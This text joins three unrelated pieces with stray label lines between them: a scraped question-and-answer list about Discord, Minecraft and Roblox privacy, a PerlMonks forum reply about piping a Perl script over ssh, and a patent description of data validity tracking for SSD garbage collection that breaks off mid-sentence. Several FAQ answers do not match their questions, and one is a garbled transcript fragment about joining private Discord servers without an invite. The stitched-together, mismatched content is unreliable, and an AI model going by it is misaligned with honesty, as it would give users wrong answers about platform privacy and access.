you’ve adjusted the settings to your needs, click “Generate a New Link” and your new invite link will appear. Is Discord really private? It does use standard encryption, but does not provide end-to-end encryption of its video chats. So while Discord does use basic encryption while data is in transit, it does not use the more secure end-to-end encryption service that other apps, like Signal or Telegram, use. Are Discord servers automatically public? Discord servers are as public as you want them to be. At the start, no one can join your server unless you or someone else has invited them by sharing the server’s link. If you post your Discord server’s link publicly on a website or anywhere on social media, it will have a public perception. Can police track Discord? Discord works with law enforcement agencies in cases of immediate danger and/or self-harm, pursuant to 18 U.S.C. § 2702. We swiftly report child abuse material and the users responsible to the National Center for Missing and Exploited Children. How do I join a private Discord server without an invite? So for example i can enter in discord dot gg devin here and if we click on join server. It’s going to allow me to join this discord server without being invited to the discord. How do I archive a Discord server? Open a channel. Tap the three dots icon in the top-right corner. Tap Archive channel. A confirmation message will ask if you’re sure you want to archive the channel. Where is the hidden Discord server? Select # Text Channel and name the channel something related to the role. Set the channel into private by toggling it to on. Tap for “Who can access this channel” to select the Roles you want to be able to access that channel. How do I hide Discord activity? To hide your game activity on Discord, you will need to go to your User Settings and then to Activity Privacy. Once you are on the page, you can just uncheck the marker labeled as Display current activity as a status message to disable showing your game activity! Can I make my Minecraft server private? First, login to the SMpicnic Control Panel and navigate to your Server Manager page. Click on the Console tab. To enable the Whitelist, enter the command whitelist on . Your server is now only accessible if your Minecraft username is added to the whitelist. How do I make my Minecraft server secure? And again at apex they handle the security they handle the ddos. And it’s super easy on apex to make sure that your friends can just just your friends can join your server. How do I make my Minecraft server safer? Don’t run the server as administrator, or as any user with admin access. Don’t run it as a user that has access to any documents or files you care about. Keep good backups of everything you care about (even if you’re not running a server!) Keep your OS, Java, and server up-to-date with the latest security patches. How do you make a private server on Roblox? How do I create and change my server? 1. Click on the Servers tab on the experience’s details page. 2. If this feature has been turned on, you will see a section entitled Private Servers. … 3. To create a new one, click the Create Private Server button. 4. Give your new server a name.
__label__pos
0.997865
Beefy Boxes and Bandwidth Generously Provided by pair Networks Keep It Simple, Stupid   PerlMonks   Re^3: run perl script with cmd line in shell by MidLifeXis (Monsignor) on Apr 16, 2012 at 13:31 UTC ( #965314=note: print w/ replies, xml ) Need Help?? in reply to Re^2: run perl script with cmd line in shell in thread run perl script with cmd line in shell 3)Embed the command line arguments into the top of your script.pl, perhaps as you are sending it across the wire to perl. This would require some pre-processing of the script and some assumptions of where you can embed the code - if I were to do it this way, I would probably have a token of some sort in the script that I would replace with my parameters --> The cmd line argumetns are also dynamic in nature..but i dont understand this entire statment correctely. can you give an example ? In your script you could have something like: # Earlier stuff in the script... # Fill in the arguments if running remotely @ARGV ||= qw(%%REPLACEDTOKEN%%); # ... and back it out if @ARGV should really be empty @ARGV = () if $ARGV[0] eq "\%\%REPLACEDTOKEN\%\%"; # Rest of your script At this point, you would use something locally to replace '%%REPLACEDTOKEN%%' with your parameters, and pipe that to a perl call on the remote machine. sed -e .... < script.pl | ssh user@remote perl I still have concerns that this is the most robust solution to your problem. Do your scripts use any temporary files? If so, I would seriously reconsider your answer to number 2. If you can write temp files, you can also write a temporary perl script. --MidLifeXis Comment on Re^3: run perl script with cmd line in shell Select or Download Code Log In? Username: Password: What's my password? Create A New User Node Status? node history Node Type: note [id://965314] help Chatterbox? and the web crawler heard nothing... How do I use this? | Other CB clients Other Users? Others perusing the Monastery: (11) As of 2016-02-10 18:56 GMT Sections? Information? Find Nodes? Leftovers? Voting Booth? How many photographs, souvenirs, artworks, trophies or other decorative objects are displayed in your home? Results (354 votes), past polls
__label__pos
0.627354
DATA VALIDITY TRACKING IN A NON-VOLATILE MEMORY A computer device reads an indicator from a configuration file that identifies a granularity of units of data at which to track validity. The granularity is one of a plurality of granularities ranging from one unit of data to many units of data. The computer device generates a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters with each data validity counter in the plurality of data validity counters tracking validity of a group of units of data at the identified granularity. The computer device transfers the machine-readable file to a memory of the memory system. Skip to: Description  ·  Claims  · Patent History  ·  Patent History Description TECHNICAL FIELD The present disclosure generally relates to non-volatile memory, and more specifically, relates to tracking data validity. BACKGROUND ART A memory subsystem can be a storage system, such as a solid-state drive (SSD), and can include one or more memory components that store data. The memory components can be, for example, non-volatile memory components and volatile memory components. In general, a host system can utilize a memory subsystem to store data at the memory components and to retrieve data from the memory components. Programmable processing devices control the operation of the memory subsystem. Changing the programming of these processing devices can change the operation of the memory subsystem. BRIEF DESCRIPTION OF THE DRAWINGS The disclosure will be understood more fully from the detailed description given below and from the accompanying drawings of various embodiments of the disclosure. The drawings, however, should not be taken to limit the disclosure to the specific embodiments, but are for explanation and understanding only. FIG. 1 illustrates an example computing environment that includes a memory subsystem in accordance with some embodiments of the present disclosure. FIGS. 2A through 2D illustrate exemplary data validity maps that track data validity at various granularities of units of data in accordance with some embodiments of the present disclosure. FIG. 3 is a flow diagram of an example method to generate a machine-readable file for tracking data validity at various granularities in accordance with some embodiments of the present disclosure. FIG. 4 is an exemplary block diagram of a reclamation process in accordance with some embodiments of the present disclosure. FIG. 5 is a flow diagram of an example method to reclaim unused portions of memory in accordance with some embodiments of the present disclosure. FIG. 6 is a block diagram of an example computer system in which embodiments of the present disclosure may operate. DETAILED DESCRIPTION Aspects of the present disclosure are directed to tracking data validity tracking in a non-volatile memory subsystem. A memory subsystem is also hereinafter referred to as a “memory device.” An example of a memory subsystem is a storage system, such as a solid-state drive (SSD). In some embodiments, the memory subsystem is a hybrid memory/storage subsystem. In general, a host system can utilize a memory subsystem that includes one or more memory components. The host system can provide data to be stored at the memory subsystem and can request data to be retrieved from the memory subsystem. To facilitate the host system's ability to store and retrieve data from the memory subsystem, the memory subsystem includes one or more processing devices that perform operations such as encoding and decoding, error recovery, compression, address translation, data erasure, and the like Changing the programming of these one or more processing devices changes the operation of the memory subsystem. Many of the operations performed by the one or more processing devices have both a computational cost (that can add delays to the time required by the host system to read or write to memory) and a memory cost (that can reserve some portion of memory thereby reducing the amount available to the host system). Data reclamation is one such operation. Sometimes referred to as “garbage collection” or “folding,” data reclamation is a process widely deployed in flash-memory subsystems to reclaim unused portions of memory. Data reclamation addresses the need to erase flash-memory in blocks before writing new data to it. When data stored in a memory subsystem is no longer needed (e.g., because the host system “deleted” or rewrote it), the data is not immediately deleted but rather flagged as no longer needed (e.g., “stale”). Because the stale data may be stored with other non-stale data in a portion of memory that is erased as a block, a data reclamation process occasionally moves the non-stale data to another portion of memory so that the block of memory can be erased and made available for new data. Thus, the data reclamation process preserves non-stale or “valid” data while freeing the space associated with the stale or “invalid” data. Depending on the available computational and memory resources for the processing device(s) included with the memory subsystem, the programming of the memory subsystem can vary because the computational and memory cost associated with one data reclamation approach may be possible with a memory subsystem designed for one workload but not with another memory subsystem designed for another workload. For example, a memory subsystem targeted toward enterprise-level storage applications may have a larger computational and memory budget to support memory subsystem operations offering higher performance due to an increased resource budget relative to a consumer-level memory subsystem. Thus, the operation (and thus programming) of memory subsystems varies from one memory subsystem design to another. As a result, a memory subsystem manufacturer develops many different code versions for each variation or version within its product line. Furthermore, the memory subsystem manufacturer maintains each code version to integrate updates, fixes, etc., complicating the maintenance of the code base for the different memory subsystems. Aspects of the present disclosure address the above and other deficiencies by automatically and dynamically preparing the firmware and/or software that controls data reclamation operations in a memory-subsystem. In this manner, different memory subsystems having different computational and memory budgets do not require the development and maintenance of different code bases for each memory subsystem. Additionally, aspects of the present disclosure address the above and other deficiencies through various implementations of the data reclamation process that can maintain computational cost of the data reclamation process while reducing the associated memory cost. The reduced memory cost can include reducing the footprint of a validity table that informs the data reclamation process which data is stale/not-stale and the footprint of address translation tables that are used during operation to translate “logical” addresses associated with read or write commands from a host system to “physical” addresses corresponding to a location or locations within the memory subsystem where the data is actually stored. FIG. 1 illustrates an example computing environment 100 that includes a memory subsystem 110 in accordance with some embodiments of the present disclosure. The memory subsystem 110 can include media, such as memory components 112A to 112N. The memory components 112A to 112N can be volatile memory components, non-volatile memory components, or a combination of such. In some embodiments, the memory subsystem is a storage system. An example of a storage system is a SSD. In some embodiments, the memory subsystem 110 is a hybrid memory/storage subsystem. In some embodiments, the computing environment 100 includes a computer system 120 that can transfer new or updated programming to the memory subsystem 110. For example, the computer system 120 can store programming information to the controller memory 119. In other embodiments, the computer system 120 uses the memory subsystem 110 for data storage and retrieval operations from the memory components 112A to 112N. For example, the computer system 120 can write data to the memory subsystem 110 and read data from the memory subsystem 110. The computer system 120 can be a computing device such as a desktop computer, laptop computer, memory programming device, network server, mobile device, or such computing device that includes a processing device 121 and a memory 122. The computer system 120 can include or be coupled to the memory subsystem 110 so that the computer system 120 can read data from or write data to the memory subsystem 110. The computer system 120 can be coupled to the memory subsystem 110 via a physical interface. In some embodiments, the computer system 120 is coupled to a component of the memory subsystem 110, such as the controller memory 119, either prior to or during manufacture of the memory subsystem. As used herein, “coupled to” generally refers to a connection between components, which can be an indirect communicative connection or direct communicative connection (e.g., without intervening components), whether wired or wireless, including connections such as electrical, optical, magnetic, etc. Examples of a physical interface include, but are not limited to, a serial advanced technology attachment (SATA) interface, a peripheral component interconnect express (PCIe) interface, universal serial bus (USB) interface, Fibre Channel, Serial Attached SCSI (SAS), JTAG IEEE 1149, etc. The physical interface can be used to transmit data between the computer system 120 and the memory subsystem 110. The computer system 120 can further utilize an NVM Express (NVMe) interface to access the memory components 112A to 112N when the memory subsystem 110 is coupled with the computer system 120 by the PCIe interface. The physical interface can provide an interface for passing control, address, data, and other signals between the memory subsystem 110 and the computer system 120. In the illustrated embodiment of computer system 120, memory 122 includes code 124 and configuration data 125. For example, the code 124 can be human-readable software (e.g., written in C, C++, etc.) and/or firmware (e.g., written in a hardware description language, etc.) and other files (e.g., libraries, etc.) that were developed to support multiple different memory subsystems. The configuration data 125 includes a configuration parameter 126 to adjust the granularity at which data validity is tracked, as described below. A compiler or other development tool executed in the computer system 120 (not shown) converts the human-readable software/firmware, using the configuration data 125, into one or more machine-readable files including instructions or configuration data to program and/or configure the controller 115 to perform the functions described herein. In other embodiments, the computer system 120 uses, but does not program, the memory subsystem 110 (e.g., the memory 122 does not include the code 124 and configuration data 125). The memory components 112A to 112N can include any combination of the different types of non-volatile memory components and/or volatile memory components. An example of non-volatile memory components includes a negative-and (NAND) type flash memory. Each of the memory components 112A to 112N can include one or more arrays of memory cells such as single level cells (SLCs) or multi-level cells (MLCs) (e.g., triple level cells (TLCs) or quad-level cells (QLCs)). In some embodiments, a particular memory component can include both an SLC portion and a MLC portion of memory cells. Each of the memory cells can store one or more bits of data (e.g., data blocks) used by the computer system 120. Although non-volatile memory components such as NAND type flash memory are described, the memory components 112A to 112N can be based on any other type of memory such as a volatile memory. In some embodiments, the memory components 112A to 112N can be, but are not limited to, random-access memory (RAM), read-only memory (ROM), dynamic RAM (DRAM), synchronous DRAM (SDRAM), phase change memory (PCM), magneto RAM (MRAM), negative-or (NOR) flash memory, electrically erasable programmable read-only memory (EEPROM), and a cross-point array of non-volatile memory cells. A cross-point array of non-volatile memory can perform bit storage based on a change of bulk resistance, in conjunction with a stackable cross-gridded data access array. Additionally, in contrast to many flash-based memories, cross-point non-volatile memory can perform a write in-place operation, where a non-volatile memory cell can be programmed without the non-volatile memory cell being previously erased. Furthermore, the memory cells of the memory components 112A to 112N can be grouped as memory pages or data blocks that can refer to a unit of the memory component used to store data. The memory subsystem controller 115 (hereinafter referred to as “controller”) can communicate with the memory components 112A to 112N to perform operations such as reading data, writing data, or erasing data at the memory components 112A to 112N and other such operations. The controller 115 can include hardware such as one or more integrated circuits and/or discrete components, a buffer memory, or a combination thereof. The controller 115 can be a microcontroller, special purpose logic circuitry (e.g., a field programmable gate array (FPGA), an application specific integrated circuit (ASIC), etc.), or other suitable processor. The controller 115 can include a processor (processing device) 117 configured to execute instructions stored in controller memory 119. In the illustrated example, the controller memory 119 of the controller 115 includes an embedded memory configured to store instructions for performing various processes, operations, logic flows, and routines that control operation of the memory subsystem 110, including handling communications between the memory subsystem 110 and the computer system 120. In some embodiments, the computer system 120 stores these instructions in the controller memory 119. In some embodiments, the controller memory 119 can include memory registers storing memory pointers, fetched data, etc. The controller memory 119 can also include read-only memory (ROM) for storing code (e.g., microcode) received from the computer system 120. In some embodiments, the instructions/configuration data 118 includes data from the machine-readable files generated by the compiler or other development tool by the computer system 120. The instructions/configuration data 118 can be executed by or can configure components of the memory subsystem 110, such as the processor 117 or the reclamation manager 113. While the example memory subsystem 110 in FIG. 1 has been illustrated as including the controller 115, in another embodiment of the present disclosure, a memory subsystem 110 may not include a controller 115, and may instead rely upon external control (e.g., provided by an external host, or by a processor or controller separate from the memory subsystem). In some embodiments, the controller memory 119 can also include DRAM and/or static RAM (SRAM) to store data for the various processes, operations, logic flows, and routines performed by the controller 115. One such type of data is a validity map 116. As described below, the validity map 116 includes data used during the data reclamation process to identify valid and invalid data. In general, the controller 115 can receive commands or operations from the computer system 120 and can convert the commands or operations into instructions or appropriate commands to achieve the desired access to the memory components 112A to 112N. In some embodiments, the controller 115 includes command support to allow the computer system 120 to program the controller memory 119. The controller 115 can be responsible for other operations such as wear leveling operations, garbage collection operations, error detection and error-correcting code (ECC) operations, encryption operations, caching operations, and address translations between a logical block address and a physical block address that are associated with the memory components 112A to 112N. In some embodiments, the controller 115 maintains one or more address lookup tables in a portion of the media (e.g., memory components 112A to 112N). In some embodiments, the controller 115 may fetch and cache portions of the table(s) in the controller memory 119. Using a logical-to-physical address lookup table, the controller 115 can obtain a physical address of data given its logical address (e.g., from the computer system 120). Depending on the level of granularity at which data validity is tracked, the controller 115 may use a physical-to-logical address lookup table to lookup a logical address for a particular physical address (e.g., during data reclamation, as described herein). In some embodiments, the physical-to-logical address lookup table may not be necessary if the granularity at which the controller 115 tracks data validity is sufficiently fine, as described herein. The controller 115 can further include interface circuitry to communicate with the computer system 120 via the physical interface. The interface circuitry can convert the commands received from the computer system 120 into command instructions to access the memory components 112A to 112N as well as convert responses associated with the memory components 112A to 112N into information for the computer system 120. The memory subsystem 110 can also include additional circuitry or components that are not illustrated. In some embodiments, the memory subsystem 110 can include a cache or buffer (e.g., DRAM) and address circuitry (e.g., a row decoder and a column decoder) that can receive an address from the controller 115 and decode the address to access the memory components 112A to 112N. The memory subsystem 110 includes a reclamation manager component 113 that can be used to reclaim portions of media based on the validity map 116. In some embodiments, the controller 115 includes at least a portion of the reclamation manager component 113. For example, the controller 115 can include a processor 117 (processing device) configured to execute instructions stored in controller memory 119 for performing the operations described herein. In some embodiments, the reclamation manager component 113 is part of the computer system 120, an application, or an operating system. The reclamation manager component 113 can identify a portion of memory to be reclaimed, determine which data within the portion of memory is used versus which data is unused, move the used data to another portion of memory, and erase the portion of memory being reclaimed. Further details with regards to the operations of the reclamation manager component 113 are described below. A variety of data organization schemes can be employed to aid in the management of the media. In one embodiment, a translation unit (TU) is the smallest granularity tracked across the address translation layer (from logical to physical addresses and vice versa). A TU is comprised of metadata and user data. In some embodiments, the size of the user data in a TU is an integer multiple of the logical block addressing sector size. For example, if each address in the logical address space identifies a 512-kilobyte sector, the size of the user data may be eight times the sector size, or 4,096-kilobytes. The metadata in a TU includes logical address information for the user data. Thus, when the computer system 120 writes user data to the memory subsystem at a logical address, the controller stores a TU, including the user data and metadata identifying the logical address, at a particular physical location within the media. TUs may be grouped to form higher logical groups at coarser levels of granularity. For example, four TUs can be grouped into a page. Four pages can be grouped to form a multiplane. Multiplanes may reside on a single memory component 112 or span multiple memory components 112A-112N to form a page stripe. Multiple page stripes can be grouped to form a block stripe. Other embodiments may include different group sizes, different numbers of granularity levels, and different layouts. The controller 115 can issue read or write operations at the varying levels of granularity, subject to varying levels of performance For example, some embodiments may exhibit increased latency with each increase in granularity (e.g., a TU read operation is faster than a page read operation; a page read operation is faster than a multiplane read operation, etc.). Other embodiments may have an operation latency that is comparable for multiple levels of granularity. For example, in embodiments where a TU, page, and multiplane are resident within a single memory component 112, the read latency associated with those logical groups may be comparable (e.g., 100 microseconds). If a block stripe spans multiple memory components 112A-112N, the read latency associated with the block stripe may scale upwards as the number of memory components increases (e.g., 100N microseconds, where N is the number of memory components 112 that the block stripe spans). FIGS. 2A through 2D illustrates exemplary data validity maps that track data validity at various granularities of units of data in accordance with some embodiments of the present disclosure. Depending on the configuration data 125, the controller 115 tracks data validity at different levels of granularity. Exemplary validity maps 116 in FIGS. 2A through 2D are based on the four levels of granularity described above (TU, page, multiplane, block stripe) and assume a block stripe size that includes 64 TUs at four TUs per page, four pages per multiplane, and four multiplanes per block stripe. In FIG. 2A, the configuration data 125 specifies that the validity map tracks data at the TU level of data granularity. Validity map 116A illustrates a validity map at the TU level of granularity. The validity map 116A comprises a counter for each TU of each block stripe. The counter represents a number of TUs having valid data. Because the granularity in this example is one TU, a single bit counter 205A represents the validity of the TU (e.g., a ‘1’ is valid, a ‘0’ means invalid). Based on the 64-TU size block stripe, the total footprint for validity map 116A in controller memory 119 is thus 64 times the number of block stripes that fit within the media (64 bits×number of block stripes). In FIG. 2B, the configuration data 125 specifies that the validity map tracks data at the page level of data granularity. Validity map 116B illustrates a validity map at the page level of granularity. The validity map 116B comprises a counter for each page of each block stripe. The counter represents the number of TUs within the page having valid data. Because the granularity in this example is one page (and assuming there are four TUs per page), the validity map 116B stores a three-bit counter 205B per page to represent five possible states (e.g., no valid TUs, one valid TU, two valid TUs, three valid TUs, or four valid TUs). Based on the 64-TU size block stripe, the total footprint for validity map 116B in controller memory 119 is thus 48 times the number of block stripes that fit within the media (3 bits/page×16 pages×number of block stripes). In FIG. 2C, the configuration data 125 specifies that the validity map tracks data at the multiplane level of data granularity. Validity map 116C illustrates a validity map at the multiplane level of granularity. The validity map 116C comprises a counter for each multiplane of each block stripe. The counter represents the number of TUs within the multiplane having valid data. Because the granularity in this example is one multiplane (and assuming there are sixteen TUs per multiplane), the validity map 116C stores a five-bit counter 205C per multiplane to represent seventeen possible states (e.g., no valid TUs, one valid TU, two valid TUs, up through sixteen valid TUs). Based on the 64-TU size block stripe, the total footprint for validity map 116B in controller memory 119 is thus 20 times the number of block stripes that fit within the media (5 bits/multiplane×4 multiplanes×number of block stripes). In FIG. 2D, the configuration data 125 specifies that the validity map tracks data at the block stripe level of data granularity. Validity map 116D illustrates a validity map at the block stripe level of granularity. The validity map 116D comprises a count for each block stripe. The count represents the number of TUs within the block stripe having valid data. Because the granularity in this example is one block stripe (and assuming there are 64 TUs per block stripe), the validity map 116D stores a seven-bit count 205D per block stripe to represent sixty-five possible states (e.g., no valid TUs, one valid TU, two valid TUs, up through sixty-four valid TUs). Based on the 64-TU size block stripe, the total footprint for validity map 116B in controller memory 119 is thus 7 times the number of block stripes that fit within the media (7 bits/block stripe×number of block stripes). As the above description of validity maps 116A-D illustrates, the coarser the granularity at which data validity is tracked, the lower the memory footprint of the validity map within controller memory 119. Thus, controller 115 provisions an amount of space in memory for the validity map 116 based on the configuration data 125. FIG. 3 is a flow diagram of an example method to generate a machine-readable file for tracking data validity at various granularities in accordance with some embodiments of the present disclosure. The method 300 can be performed by processing logic that can include hardware (e.g., processing device, circuitry, dedicated logic, programmable logic, microcode, hardware of a device, integrated circuit, etc.), software (e.g., instructions run or executed on a processing device), or a combination thereof. In some embodiments, the method {grave over ( )}Y00 is performed by the processor 121 of FIG. 1. Although shown in a particular sequence or order, unless otherwise specified, the order of the processes can be modified. Thus, the illustrated embodiments should be understood only as examples, and the illustrated processes can be performed in a different order, and some processes can be performed in parallel. Additionally, one or more processes can be omitted in various embodiments. Thus, not all processes are required in every embodiment. Other process flows are possible. In some embodiments, the process begins in response to a command from a user such as a developer. At block 310, the processing device reads one or more files containing code (e.g., code 124) used to generate the firmware and/or software that controls a memory subsystem. These files are part of a single code base that supports multiple different memory subsystems. At block 310, the processing device further reads configuration data such as configuration data 125. The configuration data may be specific to a single memory subsystem or associated with a proper subset of the memory subsystems supported by the code base. The processing device obtains an indicator that identifies a granularity of units of data at which to track validity. The indicator may designate one the various units of data, such as the TU, page, multiplane, or block stripe described herein, or units based on some other data organization scheme. In some embodiments, the indicator is dynamically calculated based on configuration data that specifies the total amount of memory of which validity is tracked relative to the amount of available space for the validity map. For example, the configuration data could indicate that the media contains space for 1,000 validity-tracked block stripes and that the validity map cannot exceed 10 kilobits of memory. Based on the data organization described herein and the validity maps described with reference to FIGS. 2A through 2B, the processing device determines validity is tracked at the block stripe level because the associated 7:1 ratio of the validity map size (7,000 bits) to block stripe count (1,000) fits within 10 kilobits, while the 20:1 ratio for a validity map tracked at the multiplane-level granularity would require more memory than is available. One or more of the files read at block 310 may be stored in a version-controlled storage repository maintained by the manufacturer or code developer. At block 315, the processing device generates a machine-readable file configured to cause a processing device associated with the memory subsystem to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters tracking validity of a group of units of data at the identified granularity. The file may be firmware and/or software in a binary file, an executable file, or some other file readable by the controller 115. At block 320, the processing device transfers the generated file (or data contained therein) to a component of the memory subsystem. For example, the computer system 120 transfers the generated file to the memory subsystem 110, which stores transferred data in the controller memory 119 as the instructions/configuration data 118, which cause the controller 115 (or its components, such as the reclamation manager 113 or the processor 117) to track data validity as described herein. In some embodiments, the processing device transfers the generated file to a memory of the memory subsystem prior to the complete assembly of the memory subsystem. As the controller 115 moves data within media or as the computer system 120 writes data to media, the controller 115 updates the counters in the validity map. For example, when the controller 115 writes a full block stripe of data to media, controller 115 sets all of the counters associated with that block stripe to reflect that all of the TUs within the block stripe are valid. As data is moved or erased, the controller 115 reads the validity counter associated with the impacted TU(s) from the validity map 116 in the controller memory 119, increments or decrements the counter, and writes the updated counter back to the validity map 116. Moving data within the media causes the media to become a patchwork of valid and invalid of data. A reclamation process moves the valid data to a new location in memory so that the original location can be erased and made available for writing data. For example, the reclamation manager 113 may process block stripes of data. At a high-level, the reclamation manager 113 identifies one or more “victim” block stripes that include invalid data and a target block stripe that is available for writing. The reclamation manager identifies valid data within the victim block stripe(s) based on the validity map 116 to move the valid data to the target block stripe so the victim block stripes can be erased. FIG. 4 is an exemplary block diagram of a reclamation process in accordance with some embodiments of the present disclosure. In such embodiments, the reclamation manager 113 is in communication with or includes one or more other components including a logical-to-physical manager 405, a read-write (RW) manager 410, a media interface 415, and a lock manager 420. Each of these components may be part of the controller 115 (although not specifically illustrated in FIG. 1). The encircled letters “A” through “F” illustrate the overall flow of the reclamation process in this example. At circle A, the reclamation manager 113 reads the validity map 116 to identify candidate block stripes for reclamation. In some embodiments, the reclamation manager 113 identifies victim block stripe(s) based on the validity counts stored within validity map 116 by, e.g., searching for the block stripe(s) with a count indicating a large number of invalid TUs. Once reclamation manager 113 has identified a victim block stripe, reclamation manager 113 reads the validity count for some number of TUs within the victim block stripe. If the validity count indicates there are no valid TUs within the granularity represented by the validity count, the reclamation manager 113 does not need to move any of the data within that group of TUs. If the validity count indicates one or more valid TUs within the granularity represented by the validity count, the reclamation manager 113 determines which TU(s) within the group of units of data associated with the count contain valid data. If the validity count is at the TU level of granularity and the counter indicates the TU is valid (e.g., a ‘1’), reclamation manager 113 proceeds to circle E. If the validity count is at a higher level of granularity than the TU, the counter value indicates the total number of TUs that include valid data but does not indicate which TUs include valid data and which TUs do not. In that case, reclamation manager proceeds to circle B. At circle B, the reclamation manager 113 issues a read to the media interface 415 to read the group of TUs associated with the validity count. For example, if the validity count is at the page level of granularity, the reclamation manager 113 issues a page read to the media interface 415 to read the page. The reclamation manager 113 determines the physical address associated with each TU based on its location within the media. For example, the reclamation manager 113 can determine the physical address of the TU based on its relative location within the block stripe being reclaimed with a known physical address. If a 64-TU block stripe for reclamation is located at a particular address in media, the location of each TU within the block stripe can be determined based on an address offset. For each TU within the group, the reclamation manager 113 extracts the logical address from the associated metadata and performs the operations described below with reference to circles C through I. At circle C, the reclamation manager 113 requests the physical address associated with the logical address obtained from the TU metadata from the logical-to-physical manager 405. If the logical-to-physical manager 405 has not cached a portion of the logical-to-physical address lookup table that includes the logical address from the TU metadata, the logical-to-physical manager 405 reads the appropriate portion of the logical-to-physical address lookup table via media interface 415, as indicated by circle D. Once the logical-to-physical manager 405 returns the physical address of the TU from the lookup associated with the logical address stored in the TU metadata, the reclamation manager compares that address with the physical address of the TU as determined from its location within the media as read at circle B. Matching physical addresses indicate the TU contains valid data (as the logical address translation is still pointing to the physical address location), while differing physical addresses indicate the TU contains invalid data. At circle E, when the reclamation manager 113 has identified a valid TU, the reclamation manager 113 requests a lock of the TU from the lock manager 420 to prevent modifications to that TU until the reclamation process completes. At circle F, the reclamation manager 113 sends a command to the RW manager 410 to write (or queue for writing) the TU to the target block stripe. At circle G, the RW manager 410 sends a message to the logical-to-physical manager 405 to update the logical-to-physical address lookup table with the new physical address of the TU within the target block stripe. At circle H, the logical-to-physical manager 405 reads the valid counts associated with the old TU location (in the victim block stripe) and with the new TU location (in the target block stripe) from the validity map 116 in controller memory 119, decrements the valid count in the former and increments the valid count in the latter, and writes the valid counts back to the validity map 119. In some embodiments, these updates to the validity map may be queued until after the entire group of TUs associated with the read at circle B is complete (and the valid count associated with the new and old locations updated by the number of TUs in the group). At circle I, the RW manager 410 writes the relocated TUs to the target block stripe and lock manager 420 releases the lock on the TU(s). In the above flow, the reclamation manager 113 need not consult a physical-to-logical address lookup table because the reclamation manager 113 was able to read the TUs associated with the validity count from media (circle B). In some cases, the granularity level may be too coarse (e.g., covering too many TUs) such that a read operation of all of the TUs (to obtain the metadata identifying their associated logical addresses) negatively impacts the performance of the reclamation manager 113. For example, if the validity map tracks validity at the block stripe level of granularity, performing a read of the entire block stripe may significantly impede other media operations (e.g., computer system 120 accesses), etc. As such, in some embodiments employing validity count granularities at a certain level or lower, the physical-to-logical address lookup table may be omitted. In these cases, the controller 115 avoids provisioning space in the media (e.g., memory components 112A to 112N) for the physical-to-logical address lookup table, freeing media resources for other purposes. FIG. 5 is a flow diagram of an example method to reclaim unused portions of memory in accordance with some embodiments of the present disclosure. The method 500 can be performed by processing logic that can include hardware (e.g., processing device, circuitry, dedicated logic, programmable logic, microcode, hardware of a device, integrated circuit, etc.), software (e.g., instructions run or executed on a processing device), or a combination thereof. In some embodiments, the method {grave over ( )}Y00 is performed by the reclamation manager component 113 of FIG. 1. Although shown in a particular sequence or order, unless otherwise specified, the order of the processes can be modified. Thus, the illustrated embodiments should be understood only as examples, and the illustrated processes can be performed in a different order, and some processes can be performed in parallel. Additionally, one or more processes can be omitted in various embodiments. Thus, not all processes are required in every embodiment. Other process flows are possible. Having identified one or more folding victims and a folding target, at block 505, the processing device reads a validity count from a validity map associated with one of the victims (e.g., a block stripe). The validity count represents the validity of a group of units of data at a granularity based on the configuration of or the instructions executed by the memory subsystem 110 from the instructions/configuration data 118. For example, if the victim is a block stripe that contains four multiplanes and the validity map granularity is at the multiplane level, the count represents the number of valid TUs within the multiplane. At block 510, the processing device reads the group of units of data associated with the validity count from media. The read data includes the metadata that identifies the logical address of each unit TU within the group. For example, if the validity count is at the multiplane level, the group includes 16 TUs, each having metadata identifying its corresponding logical address. Note that the processing device can determine the physical address of each TU in the group based on its relative location within the victim block stripe (e.g., based on an offset relative to the block stripe's physical address). At block 515, the processing device obtains another physical address of the unit of data from a logical-to-physical address lookup. This second physical address is based on a lookup of the logical address stored in the metadata associated with the unit of data in the logical-to-physical address translation table. At block 520, the processing device determines whether a unit has valid data. To do so, the processing device compares the offset-based physical address of the unit of data (e.g., from the unit of data's position within the victim block stripe) to the logical-to-physical lookup-based physical address (e.g., from the address translation table). Because writes to a logical address are written to a new location in memory (with a corresponding update to the logical-to-physical address translation table) rather than overwriting the existing data in memory, if the offset-based physical address does not match the logical-to-physical lookup-based physical address, the unit of data is no longer valid. At block 525, the processing device writes each unit determined to have valid data to a new location within the target block stripe and updates a logical-to-physical address table for each rewritten unit by writing the new physical address of the unit within the target block stripe to the corresponding logical address position within the table. Once all of the valid data in the victim block stripe has been moved, the block stripe can be erased. At block 530, the processing device updates the validity map by incrementing and/or decrementing validity counts associated with the TUs in the victim and target block stripe(s). For example, if the validity map includes counters tracking validity at the multiplane level and relocated four valid TUs from a multiplane in the victim block stripe to a multiplane in the target block stripe, the processing device decrements the counter associated with the multiplane in the victim block stripe and increments the counter associated with the multiplane in the target block stripe. The incrementing or decrementing may occur after each move of the smallest granularity of data (e.g., by −/+1 each time a TU is moved), when all of the units of data within the counter granularity have been moved (e.g., −/+X where X is between 1 and the number of units of data within a counter granularity), or in some other manner. In some embodiments, the processing device moves all valid data within the victim block stripe and resets all of the corresponding validity counters (without decrementing) when the block stripe is erased. FIG. 6 illustrates an example machine of a computer system 600 within which a set of instructions, for causing the machine to perform any one or more of the methodologies discussed herein, can be executed. In some embodiments, the computer system 600 can correspond to a computer system (e.g., computer host system 120 of FIG. 1) that includes, is coupled to, or utilizes a memory subsystem (e.g., the memory subsystem 110 of FIG. 1) or can be used to perform the operations of a controller (e.g., to execute an operating system to perform operations corresponding to the reclamation manager component 113 of FIG. 1). In alternative embodiments, the machine can be connected (e.g., networked) to other machines in a LAN, an intranet, an extranet, and/or the Internet. The machine can operate in the capacity of a server or a client machine in client-server network environment, as a peer machine in a peer-to-peer (or distributed) network environment, or as a server or a client machine in a cloud computing infrastructure or environment. The machine can be a personal computer (PC), a tablet PC, a set-top box (STB), a Personal Digital Assistant (PDA), a cellular telephone, a web appliance, a server, a network router, a switch or bridge, or any machine capable of executing a set of instructions (sequential or otherwise) that specify actions to be taken by that machine. Further, while a single machine is illustrated, the term “machine” shall also be taken to include any collection of machines that individually or jointly execute a set (or multiple sets) of instructions to perform any one or more of the methodologies discussed herein. The example computer system 600 includes a processing device 602, a main memory 604 (e.g., read-only memory (ROM), flash memory, dynamic random access memory (DRAM) such as synchronous DRAM (SDRAM) or Rambus DRAM (RDRAM), etc.), a static memory 606 (e.g., flash memory, static random access memory (SRAM), etc.), and a data 